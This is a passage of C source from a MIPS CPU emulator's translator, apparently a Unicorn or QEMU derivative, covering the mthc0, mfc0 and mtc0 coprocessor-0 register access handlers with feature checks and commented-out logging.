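/* CP0_CHECK() above branches to cp0_unimplemented when the guarded facility is absent, so the helper below only runs on cores that implement SAAR. */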
gen_helper_mthc0_saar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: /* * LLAddr is read-only (the only exception is bit 0 if LLB is * supported); the CP0_LLAddr_rw_bitmask does not seem to be * relevant for modern MIPS cores supporting MTHC0, therefore * treating MTHC0 to LLAddr as NOP. */ //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_mthc0_maar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: /* upper 32 bits are only available when Config5MI != 0 */ CP0_CHECK(ctx->mi); gen_helper_0e1i(mthc0_watchhi, arg, sel); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case 0: case 2: case 4: case 6: tcg_gen_andi_tl(tcg_ctx, arg, arg, mask); gen_mthc0_store64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_TagLo)); //register_name = "TagLo"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } cp0_unimplemented: //qemu_log_mask(LOG_UNIMP, "mthc0 %s (reg %d sel %d)\n", // register_name, reg, sel); return; } static inline void gen_mfc0_unimplemented(DisasContext *ctx, TCGv arg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->insn_flags & ISA_MIPS32R6) { tcg_gen_movi_tl(tcg_ctx, arg, 0); } else { tcg_gen_movi_tl(tcg_ctx, arg, ~0); } } static void gen_mfc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; if (sel != 0) { check_insn(ctx, ISA_MIPS32); } switch (reg) { case CP0_REGISTER_00: switch (sel) { case CP0_REG00__INDEX: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Index)); //register_name = "Index"; break; case CP0_REG00__MVPCONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpcontrol(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPControl"; break; case CP0_REG00__MVPCONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpconf0(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPConf0"; break; case CP0_REG00__MVPCONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_mvpconf1(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MVPConf1"; break; case CP0_REG00__VPCONTROL: CP0_CHECK(ctx->vp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPControl)); //register_name = "VPControl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_01: switch (sel) { case CP0_REG01__RANDOM: CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); gen_helper_mfc0_random(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "Random"; break; case CP0_REG01__VPECONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEControl)); //register_name = "VPEControl"; break; case CP0_REG01__VPECONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf0)); //register_name = "VPEConf0"; break; case CP0_REG01__VPECONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf1)); //register_name = "VPEConf1"; break; case CP0_REG01__YQMASK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load64(tcg_ctx, 
arg, offsetof(CPUMIPSState, CP0_YQMask)); //register_name = "YQMask"; break; case CP0_REG01__VPESCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPESchedule)); //register_name = "VPESchedule"; break; case CP0_REG01__VPESCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load64(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEScheFBack)); //register_name = "VPEScheFBack"; break; case CP0_REG01__VPEOPT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_VPEOpt)); //register_name = "VPEOpt"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_02: switch (sel) { case CP0_REG02__ENTRYLO0: { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo0)); #if defined(TARGET_MIPS64) if (ctx->rxi) { /* Move RI/XI fields to bits 31:30 */ tcg_gen_shri_tl(tcg_ctx, arg, tmp, CP0EnLo_XI); tcg_gen_deposit_tl(tcg_ctx, tmp, tmp, arg, 30, 2); } #endif gen_move_low32(tcg_ctx, arg, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } //register_name = "EntryLo0"; break; case CP0_REG02__TCSTATUS: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcstatus(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCStatus"; break; case CP0_REG02__TCBIND: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcbind(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCBind"; break; case CP0_REG02__TCRESTART: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcrestart(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCRestart"; break; case CP0_REG02__TCHALT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tchalt(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCHalt"; break; case CP0_REG02__TCCONTEXT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tccontext(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCContext"; break; case CP0_REG02__TCSCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcschedule(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCSchedule"; break; case CP0_REG02__TCSCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mfc0_tcschefback(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "TCScheFBack"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo1)); #if defined(TARGET_MIPS64) if (ctx->rxi) { /* Move RI/XI fields to bits 31:30 */ tcg_gen_shri_tl(tcg_ctx, arg, tmp, CP0EnLo_XI); tcg_gen_deposit_tl(tcg_ctx, tmp, tmp, arg, 30, 2); } #endif gen_move_low32(tcg_ctx, arg, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } //register_name = "EntryLo1"; break; case CP0_REG03__GLOBALNUM: CP0_CHECK(ctx->vp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_GlobalNumber)); //register_name = "GlobalNumber"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_04: switch (sel) { case CP0_REG04__CONTEXT: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_Context)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "Context"; break; case CP0_REG04__CONTEXTCONFIG: /* SmartMIPS ASE */ /* gen_helper_mfc0_contextconfig(tcg_ctx, arg); */ //register_name = "ContextConfig"; goto cp0_unimplemented; case CP0_REG04__USERLOCAL: CP0_CHECK(ctx->ulri); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); 
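/* Like the other 64-bit-capable registers read via MFC0, UserLocal is returned as the sign-extended low 32 bits of its stored value. */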
//register_name = "UserLocal"; break; case CP0_REG04__MMID: CP0_CHECK(ctx->mi); gen_helper_mtc0_memorymapid(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MMID"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_05: switch (sel) { case CP0_REG05__PAGEMASK: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PageMask)); //register_name = "PageMask"; break; case CP0_REG05__PAGEGRAIN: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PageGrain)); //register_name = "PageGrain"; break; case CP0_REG05__SEGCTL0: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl0)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "SegCtl0"; break; case CP0_REG05__SEGCTL1: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl1)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "SegCtl1"; break; case CP0_REG05__SEGCTL2: CP0_CHECK(ctx->sc); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SegCtl2)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "SegCtl2"; break; case CP0_REG05__PWBASE: check_pw(ctx); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWBase)); //register_name = "PWBase"; break; case CP0_REG05__PWFIELD: check_pw(ctx); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWField)); //register_name = "PWField"; break; case CP0_REG05__PWSIZE: check_pw(ctx); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWSize)); //register_name = "PWSize"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_06: switch (sel) { case CP0_REG06__WIRED: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Wired)); //register_name = "Wired"; break; case CP0_REG06__SRSCONF0: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf0)); //register_name = "SRSConf0"; break; case CP0_REG06__SRSCONF1: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf1)); //register_name = "SRSConf1"; break; case CP0_REG06__SRSCONF2: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf2)); //register_name = "SRSConf2"; break; case CP0_REG06__SRSCONF3: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf3)); //register_name = "SRSConf3"; break; case CP0_REG06__SRSCONF4: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf4)); //register_name = "SRSConf4"; break; case CP0_REG06__PWCTL: check_pw(ctx); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWCtl)); //register_name = "PWCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_07: switch (sel) { case CP0_REG07__HWRENA: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_HWREna)); //register_name = "HWREna"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_08: switch (sel) { case CP0_REG08__BADVADDR: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "BadVAddr"; break; case CP0_REG08__BADINSTR: CP0_CHECK(ctx->bi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstr)); //register_name = "BadInstr"; break; case CP0_REG08__BADINSTRP: CP0_CHECK(ctx->bp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrP)); //register_name = "BadInstrP"; break; case 
CP0_REG08__BADINSTRX: CP0_CHECK(ctx->bi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrX)); tcg_gen_andi_tl(tcg_ctx, arg, arg, ~0xffff); //register_name = "BadInstrX"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__COUNT: /* Mark as an IO operation because we read the time. */ if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_mfc0_count(tcg_ctx, arg, tcg_ctx->cpu_env); /* * Break the TB to be able to take timer interrupts immediately * after reading count. DISAS_STOP isn't sufficient, we need to * ensure we break completely out of translated code. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Count"; break; case CP0_REG09__SAARI: CP0_CHECK(ctx->saar); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SAARI)); //register_name = "SAARI"; break; case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_mfc0_saar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_10: switch (sel) { case CP0_REG10__ENTRYHI: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryHi)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "EntryHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_11: switch (sel) { case CP0_REG11__COMPARE: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Compare)); //register_name = "Compare"; break; /* 6,7 are implementation dependent */ default: goto cp0_unimplemented; } break; case CP0_REGISTER_12: switch (sel) { case CP0_REG12__STATUS: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Status)); //register_name = "Status"; break; case CP0_REG12__INTCTL: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_IntCtl)); //register_name = "IntCtl"; break; case CP0_REG12__SRSCTL: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSCtl)); //register_name = "SRSCtl"; break; case CP0_REG12__SRSMAP: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); //register_name = "SRSMap"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_13: switch (sel) { case CP0_REG13__CAUSE: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Cause)); //register_name = "Cause"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_14: switch (sel) { case CP0_REG14__EPC: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "EPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_15: switch (sel) { case CP0_REG15__PRID: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PRid)); //register_name = "PRid"; break; case CP0_REG15__EBASE: check_insn(ctx, ISA_MIPS32R2); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EBase)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "EBase"; break; case CP0_REG15__CMGCRBASE: check_insn(ctx, ISA_MIPS32R2); CP0_CHECK(ctx->cmgcr); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_CMGCRBase)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "CMGCRBase"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_16: switch (sel) { case CP0_REG16__CONFIG: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config0)); //register_name = "Config"; break; case 
CP0_REG16__CONFIG1: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config1)); //register_name = "Config1"; break; case CP0_REG16__CONFIG2: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config2)); //register_name = "Config2"; break; case CP0_REG16__CONFIG3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config3)); //register_name = "Config3"; break; case CP0_REG16__CONFIG4: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config4)); //register_name = "Config4"; break; case CP0_REG16__CONFIG5: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config5)); //register_name = "Config5"; break; /* 6,7 are implementation dependent */ case CP0_REG16__CONFIG6: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config6)); //register_name = "Config6"; break; case CP0_REG16__CONFIG7: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config7)); //register_name = "Config7"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: gen_helper_mfc0_lladdr(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_mfc0_maar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MAAR"; break; case CP0_REG17__MAARI: CP0_CHECK(ctx->mrp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_MAARI)); //register_name = "MAARI"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_18: switch (sel) { case CP0_REG18__WATCHLO0: case CP0_REG18__WATCHLO1: case CP0_REG18__WATCHLO2: case CP0_REG18__WATCHLO3: case CP0_REG18__WATCHLO4: case CP0_REG18__WATCHLO5: case CP0_REG18__WATCHLO6: case CP0_REG18__WATCHLO7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_1e0i(mfc0_watchlo, arg, sel); //register_name = "WatchLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_1e0i(mfc0_watchhi, arg, sel); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_20: switch (sel) { case CP0_REG20__XCONTEXT: #if defined(TARGET_MIPS64) check_insn(ctx, ISA_MIPS3); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_XContext)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "XContext"; break; #endif default: goto cp0_unimplemented; } break; case CP0_REGISTER_21: /* Officially reserved, but sel 0 is used for R1x000 framemask */ CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); switch (sel) { case 0: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Framemask)); //register_name = "Framemask"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_22: tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ //register_name = "'Diagnostic"; /* implementation dependent */ break; case CP0_REGISTER_23: switch (sel) { case CP0_REG23__DEBUG: gen_helper_mfc0_debug(tcg_ctx, arg, tcg_ctx->cpu_env); /* EJTAG support */ //register_name = "Debug"; break; case CP0_REG23__TRACECONTROL: /* PDtrace support */ /* gen_helper_mfc0_tracecontrol(tcg_ctx, arg); */ //register_name = "TraceControl"; goto cp0_unimplemented; case CP0_REG23__TRACECONTROL2: /* PDtrace support */ /* gen_helper_mfc0_tracecontrol2(tcg_ctx, arg); */ //register_name = "TraceControl2"; goto cp0_unimplemented; case 
CP0_REG23__USERTRACEDATA1: /* PDtrace support */ /* gen_helper_mfc0_usertracedata1(tcg_ctx, arg);*/ //register_name = "UserTraceData1"; goto cp0_unimplemented; case CP0_REG23__TRACEIBPC: /* PDtrace support */ /* gen_helper_mfc0_traceibpc(tcg_ctx, arg); */ //register_name = "TraceIBPC"; goto cp0_unimplemented; case CP0_REG23__TRACEDBPC: /* PDtrace support */ /* gen_helper_mfc0_tracedbpc(tcg_ctx, arg); */ //register_name = "TraceDBPC"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_24: switch (sel) { case CP0_REG24__DEPC: /* EJTAG support */ tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "DEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_25: switch (sel) { case CP0_REG25__PERFCTL0: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Performance0)); //register_name = "Performance0"; break; case CP0_REG25__PERFCNT0: /* gen_helper_mfc0_performance1(tcg_ctx, arg); */ //register_name = "Performance1"; goto cp0_unimplemented; case CP0_REG25__PERFCTL1: /* gen_helper_mfc0_performance2(tcg_ctx, arg); */ //register_name = "Performance2"; goto cp0_unimplemented; case CP0_REG25__PERFCNT1: /* gen_helper_mfc0_performance3(tcg_ctx, arg); */ //register_name = "Performance3"; goto cp0_unimplemented; case CP0_REG25__PERFCTL2: /* gen_helper_mfc0_performance4(tcg_ctx, arg); */ //register_name = "Performance4"; goto cp0_unimplemented; case CP0_REG25__PERFCNT2: /* gen_helper_mfc0_performance5(tcg_ctx, arg); */ //register_name = "Performance5"; goto cp0_unimplemented; case CP0_REG25__PERFCTL3: /* gen_helper_mfc0_performance6(tcg_ctx, arg); */ //register_name = "Performance6"; goto cp0_unimplemented; case CP0_REG25__PERFCNT3: /* gen_helper_mfc0_performance7(tcg_ctx, arg); */ //register_name = "Performance7"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_26: switch (sel) { case CP0_REG26__ERRCTL: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_ErrCtl)); //register_name = "ErrCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_27: switch (sel) { case CP0_REG27__CACHERR: tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ //register_name = "CacheErr"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case CP0_REG28__TAGLO: case CP0_REG28__TAGLO1: case CP0_REG28__TAGLO2: case CP0_REG28__TAGLO3: { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_TagLo)); gen_move_low32(tcg_ctx, arg, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } //register_name = "TagLo"; break; case CP0_REG28__DATALO: case CP0_REG28__DATALO1: case CP0_REG28__DATALO2: case CP0_REG28__DATALO3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DataLo)); //register_name = "DataLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_29: switch (sel) { case CP0_REG29__TAGHI: case CP0_REG29__TAGHI1: case CP0_REG29__TAGHI2: case CP0_REG29__TAGHI3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_TagHi)); //register_name = "TagHi"; break; case CP0_REG29__DATAHI: case CP0_REG29__DATAHI1: case CP0_REG29__DATAHI2: case CP0_REG29__DATAHI3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DataHi)); //register_name = "DataHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_30: switch (sel) { case CP0_REG30__ERROREPC: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, 
CP0_ErrorEPC)); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "ErrorEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_31: switch (sel) { case CP0_REG31__DESAVE: /* EJTAG support */ gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); //register_name = "DESAVE"; break; case CP0_REG31__KSCRATCH1: case CP0_REG31__KSCRATCH2: case CP0_REG31__KSCRATCH3: case CP0_REG31__KSCRATCH4: case CP0_REG31__KSCRATCH5: case CP0_REG31__KSCRATCH6: CP0_CHECK(ctx->kscrexist & (1 << sel)); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_KScratch[sel - 2])); tcg_gen_ext32s_tl(tcg_ctx, arg, arg); //register_name = "KScratch"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } return; cp0_unimplemented: //qemu_log_mask(LOG_UNIMP, "mfc0 %s (reg %d sel %d)\n", //register_name, reg, sel); gen_mfc0_unimplemented(ctx, arg); } static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; if (sel != 0) { check_insn(ctx, ISA_MIPS32); } if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } switch (reg) { case CP0_REGISTER_00: switch (sel) { case CP0_REG00__INDEX: gen_helper_mtc0_index(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Index"; break; case CP0_REG00__MVPCONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_mvpcontrol(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MVPControl"; break; case CP0_REG00__MVPCONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); /* ignored */ //register_name = "MVPConf0"; break; case CP0_REG00__MVPCONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); /* ignored */ //register_name = "MVPConf1"; break; case CP0_REG00__VPCONTROL: CP0_CHECK(ctx->vp); /* ignored */ //register_name = "VPControl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_01: switch (sel) { case CP0_REG01__RANDOM: /* ignored */ //register_name = "Random"; break; case CP0_REG01__VPECONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEControl"; break; case CP0_REG01__VPECONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEConf0"; break; case CP0_REG01__VPECONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeconf1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEConf1"; break; case CP0_REG01__YQMASK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_yqmask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "YQMask"; break; case CP0_REG01__VPESCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPESchedule)); //register_name = "VPESchedule"; break; case CP0_REG01__VPESCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPEScheFBack)); //register_name = "VPEScheFBack"; break; case CP0_REG01__VPEOPT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeopt(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEOpt"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_02: switch (sel) { case CP0_REG02__ENTRYLO0: gen_helper_mtc0_entrylo0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryLo0"; break; case CP0_REG02__TCSTATUS: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCStatus"; break; case CP0_REG02__TCBIND: 
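/* The TC* registers below (TCBind, TCRestart, TCHalt, ...) belong to the MT ASE; each write falls through to cp0_unimplemented unless ASE_MT is implemented. */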
